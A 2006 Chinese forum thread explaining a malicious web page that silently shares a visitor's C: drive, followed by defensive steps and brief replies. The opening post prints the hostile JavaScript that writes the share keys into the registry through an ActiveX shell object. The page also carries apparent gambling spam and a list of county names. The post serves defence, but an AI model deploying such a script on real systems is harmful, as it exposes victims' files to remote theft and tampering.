金年会 金字招牌诚信至上,金年会 金字招牌诚信至上,金年会 金字招牌诚信至上,金年会 金字招牌诚信至上

 找回密碼
 注冊

QQ登錄

只需一步,快速開(kāi)始

查看: 4449|回復: 7
打印 上一主題 下一主題

[分享] 網(wǎng)絡(luò )知識

跳轉到指定樓層
1#
wwblax 發(fā)表于 2006-4-11 08:03:00 | 只看該作者 回帖獎勵 |倒序瀏覽 |閱讀模式 來(lái)自 中國河北石家莊

馬上注冊,結交更多好友,享用更多功能。

您需要 登錄 才可以下載或查看,沒(méi)有帳號?注冊

x
現在上網(wǎng)真是不安全,前一陣子鬧得最兇的是“萬(wàn)花谷”,如果進(jìn)入該網(wǎng)頁(yè)瀏覽者注冊表會(huì )被修改,好多系統功能因此受到限制。最近又聽(tīng)說(shuō)有網(wǎng)友在瀏覽網(wǎng)頁(yè)時(shí)硬盤(pán)被共享,危害似乎更大!
  其實(shí),所謂的瀏覽網(wǎng)頁(yè)硬盤(pán)被共享,和“萬(wàn)花谷”一樣,受害者都是在瀏覽了含有有害代碼的ActiveX網(wǎng)頁(yè)文件后中招的。以下是該網(wǎng)頁(yè)原代碼中的關(guān)鍵部分:
script language=JavaScript
document.write("");
function f(){
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Network\\LanMan\\RWC$\\Flags",302,"REG_DWORD"
);
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion
\\Network\\LanMan\\ RWC$\\Type",0,"REG_DWORD"
);
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\
LanMan\\RWC$\\Path","C:\\"
);
}
function init()
{
setTimeout("f()", 1000);
}
init();
/script
  注意:以“Shl.RegWrite”開(kāi)頭的這幾句代碼的作用是寫(xiě)入瀏覽者的注冊表,在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面添加鍵值“RWC$” ,在RWC$”下又分別建立鍵值“Flags”、“Type”“Path”,這樣就把c盤(pán)設為共享了,共享名為RWC$。而且你在網(wǎng)絡(luò )屬性中還看不到硬盤(pán)被共享了!如果把"Flags"=dword:00000302改成"Flags"=dword:00000402就可看到硬盤(pán)被共享。
  由于只要瀏覽這類(lèi)網(wǎng)頁(yè)硬盤(pán)即被共享,因此其危害較之木馬更大(個(gè)人觀(guān)點(diǎn))。如果不小心中招,那么給你下套的人完全可以把你的硬盤(pán)當做他的一個(gè)邏輯硬盤(pán),他可以在你電腦中隨意拷貝文件,刪除文件,給文件改名……如果這樣還不能令他滿(mǎn)意,他完全可以給你再下個(gè)木馬(哦,錯了!不是一個(gè)、是一群木馬),那樣你就生不如死了,什么秘密都沒(méi)有了:上網(wǎng)賬號、QQ密碼、給MM的信件……如果他高興還可以格式化你的硬盤(pán),或者是在你的電腦中運行“江民炸彈”之類(lèi)的軟件破壞你的硬盤(pán)?傊,你的一切都在他的掌握之下了,想想夠可怕了吧?
  解決辦法:把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面的“RWC$”刪掉。狠一點(diǎn)的,也可以把windows\system\下面的Vserver.vxd(Microsoft 網(wǎng)絡(luò )上的文件與打印機共享,虛擬設備驅動(dòng)程序)刪掉,再把HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\下的Vserver鍵值刪掉,永絕這類(lèi)“木馬”的后路吧。
  防御防范:
  1、不要輕易去一些自己并不了解的站點(diǎn),特別是那些看上去美麗誘人的網(wǎng)址更不要貿然前往,否則吃虧的往往是你。
  2、運行IE,點(diǎn)擊“工具→Internet選項→安全→Internet區域的安全級別,把安全極別由“中”改為“高”
  3、由于該類(lèi)網(wǎng)頁(yè)是含有有害代碼的ActiveX網(wǎng)頁(yè)文件,因此在IE設置中將ActiveX插件和控件、Java腳本等全部禁止就可以避免中招。具體方法是:在IE窗口中點(diǎn)擊“工具→Internet選項,在彈出的對話(huà)框中選擇“安全”標簽,再點(diǎn)擊“自定義級別”按鈕,就會(huì )彈出“安全設置”對話(huà)框,把其中所有ActiveX插件和控件以及Java相關(guān)全部選擇“禁用”即可。不過(guò),這樣做在以后的網(wǎng)頁(yè)瀏覽過(guò)程中可能會(huì )造成一些正常使用ActiveX的網(wǎng)站無(wú)法瀏覽。唉,有利就有弊,你還是自己看著(zhù)辦吧。
  4、對于Windows98用戶(hù),請打開(kāi)C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP,把其中的“ActiveXComponent.class”刪掉;對于WindowsMe用戶(hù),請打開(kāi)C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP,把其中的“ActiveXComponent.class”刪掉。請放心,刪除這個(gè)組件不會(huì )影響到你正常瀏覽網(wǎng)頁(yè)的。
  5、既然這類(lèi)網(wǎng)頁(yè)是通過(guò)修改注冊表來(lái)破壞我們的系統,那么我們可以事先把注冊表加鎖:禁止修改注冊表,這樣就可以達到預防的目的。不過(guò),自己要使用注冊表編輯器regedit.exe該怎么辦呢?因此我們還要在此前事先準備一把“鑰匙”,以便打開(kāi)這把“鎖”!
  加鎖方法如下:
  (1)運行注冊表編輯器regedit.exe;
  (2)展開(kāi)注冊表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下,新建一個(gè)名為DisableRegistryTools的DWORD值,并將其值改為“1”,即可禁止使用注冊表編輯器regedit.exe。
  解鎖方法如下:
  用記事本編輯一個(gè)任意名字的.reg文件,比如unlock.reg,內容如下:
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
  存盤(pán)。你就有了一把解鎖的鑰匙了!如果要使用注冊表編輯器,則雙擊unlock.reg即可。要注意的是,在“REGEDIT4”后面一定要空一行,并且“REGEDIT4”中的“4”和“T”之間一定不能有空格,否則將前功盡棄!
  6、安裝網(wǎng)絡(luò )防火墻,特別是安裝了Norton2001后,進(jìn)入該類(lèi)網(wǎng)頁(yè)就會(huì )報警提示有腳本寫(xiě)注冊表,國產(chǎn)反病毒軟件KVW3000也有此類(lèi)功效,建議你也安裝一個(gè)這樣的軟件。
  7、雖然經(jīng)過(guò)一番辛苦的勞動(dòng)修改回了標題和默認連接首頁(yè),但如果以后又不小心進(jìn)入該站就又得麻煩一次。其實(shí),你可以在IE中做一些設置以便永遠不進(jìn)該站點(diǎn):
打開(kāi)IE,點(diǎn)擊“工具”→“Internet選項”→“內容”→“分級審查”,點(diǎn)“啟用”按鈕,會(huì )調出“分級審查”對話(huà)框,然后點(diǎn)擊“許可站點(diǎn)”標簽,輸入不想去的網(wǎng)站網(wǎng)址,如輸入:http://www.sohu8.com,按“從不”按鈕,再點(diǎn)擊“確定”即大功告成!
2#
老李先生 發(fā)表于 2007-5-6 09:26:42 | 只看該作者 來(lái)自 中國廣東東莞
多好的東西                  
頂 頂 頂
頂 頂 頂
3#
luobin999 發(fā)表于 2007-5-9 17:55:51 | 只看該作者 來(lái)自 中國江西贛州
4#
XYLATY99 發(fā)表于 2007-5-30 21:45:36 | 只看該作者 來(lái)自 中國湖北武漢
支持一下
5#
wincopy 發(fā)表于 2007-7-2 10:45:01 | 只看該作者 來(lái)自 中國江西南昌

回復 #1 wwblax 的帖子

6#
liming414 發(fā)表于 2007-7-2 17:24:26 | 只看該作者 來(lái)自 中國
公司計算機沒(méi)這東介紹點(diǎn)別的啊
7#
295633799lhl 發(fā)表于 2007-9-12 21:00:31 | 只看該作者 來(lái)自 中國河南鄭州
看不懂啊!
8#
jieyujun3 發(fā)表于 2007-9-12 21:28:35 | 只看該作者 來(lái)自 中國廣西南寧
好,我上初學(xué)者
您需要登錄后才可以回帖 登錄 | 注冊

本版積分規則

快速回復 返回頂部 返回列表
大姚县| 郴州市| 临桂县| 伊宁县| 海阳市| 雅安市| 安义县| 方山县| 田阳县| 苍山县| 蒙山县| 通渭县| 鞍山市| 三明市| 南召县| 璧山县| 潜江市| 新干县| 无锡市| 兴和县| 榕江县| 九台市| 望谟县| 彰武县| 台州市| 云南省| 六枝特区| 喀什市| 柯坪县| 郁南县| 漳浦县| 环江| 禹州市| 论坛| 宜春市| 麟游县| 邢台市| 罗源县| 忻州市| 托克逊县| 常德市|